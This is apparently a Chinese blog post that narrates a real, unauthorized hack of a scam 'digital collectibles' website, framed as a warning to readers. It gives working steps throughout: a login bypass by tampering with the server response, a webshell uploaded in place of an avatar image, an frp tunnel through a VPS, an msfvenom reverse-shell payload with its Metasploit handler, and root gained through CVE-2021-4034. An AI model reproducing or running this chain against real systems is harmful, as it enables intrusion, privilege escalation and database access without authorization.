【网络安全】记一次杀猪盘渗透实战

看起来非常假的网站这个网站是没有cdn的用的是thinkphpk框架搭建的。

先打一波poc没有效果,

访问一下后台直接在url后面加/admin。

一个开源的cms还没有验证码尝试用burp进行爆破,首先在火狐上设置代理ip为127.0.0.1代理端口为8081。

Burp上也要设置端口为8081,将Intercept设置为on输入账号密码点击登录就能拦截到数据包。

在爆破之前先发送到Repeater模块发送看看反应。

用户不存在返回code为1的响应码,尝试拦截返回包把1改为0。

成功登录后台,这应该是个前端js验证非常的不安全。

尝试找上传点,点击用户管理-编辑-上传头像,上传一张jpg文件在用burp抓包改为php将内容改为冰蝎马。

成功上传链接冰蝎马。

想办法上线到msf提权,这里就使用frp内网穿透,在我的vps开启frp。

./frps -c frps.ini

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eZl49f5T-1663771859261)(https://upload-images.jianshu.io/upload_images/26472780-6ca78873840a2e91.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

在内网上的kali进行设置

设置配置文件将8000端口的流量转到kali的6666端口。

启动客户端

./frpc -c frpc.ini

生成msf木马ip和端口要填vps的

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=**** LPORT=8000 -f elf > shell.elf

这里的lhost 应为服务器地址 LPORT 为反向代理端口,将shell.elf上传到/www/wwwroot/目录设置权限为777。

打开msf进行监听

复制代码
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 6666
exploit

运行shell.elf

./shell.elf

成功返回会话。

使用模块run post/multi/recon/local_exploit_suggester进行漏洞查询。

使用cve-2021-4034提权,切换到linux shell下面然后进到/tmp目录下下载脚本。

git clone

似乎不行卡住了直接上传上去吧。

复制代码
upload /home/kali/Desktop/CVE-2021-4034  /tmp/

进入shell

cd /tmp

make

chmod 777 cve-2021-4034

./cve-2021-4034

返回root权限。

查看database.php文件链接数据库发现基本上也没有人充值,看到一个账号40w的就是这家所谓数字藏品公司的老总。

登进入尝试体现均提示账户金额异常看来是跑路了,加了它们的官方群进入一看全是讨钱的

在这里提醒一下各位这种所谓的数字藏品都是骗局根本提不出来钱的。

相关推荐
AI创界者10 小时前
【实战演练】基于 Kali Linux 的自动化漏洞扫描与安全加固指南
网络·安全·web安全
听你说3210 小时前
五新智能:以成套智能装备赋能全球工程建设
安全·创业创新
小五传输11 小时前
内外网文件交换系统产品推荐 解决隔离网络文件交换5类难题
大数据·运维·安全
从零开始的代码生活_11 小时前
Linux epoll 多路转接详解
linux·运维·网络·后端·tcp/ip·计算机网络·php
小鹿软件办公11 小时前
通过调整编码参数使用 VLC 媒体播放器无损压缩视频方法
运维·网络·音视频
yqcoder13 小时前
什么是 Math 对象
网络·网络协议·udp
Piko6141 天前
H3C IRF2 堆叠实战:打造高可靠核心交换网络
运维·网络·笔记
技术不好的崎鸣同学1 天前
[ACTF2020 新生赛]Exec 思路及解法
算法·安全·web安全
茯苓gao1 天前
嵌入式开发笔记:CANopen相关移位运算与通信协议术语详解
网络·嵌入式硬件·学习·信息与通信
万联WANFLOW1 天前
SD-WAN 控制平面高可用怎么做?SDWAN 控制器挂了,全网会发生什么
运维·网络·分布式·架构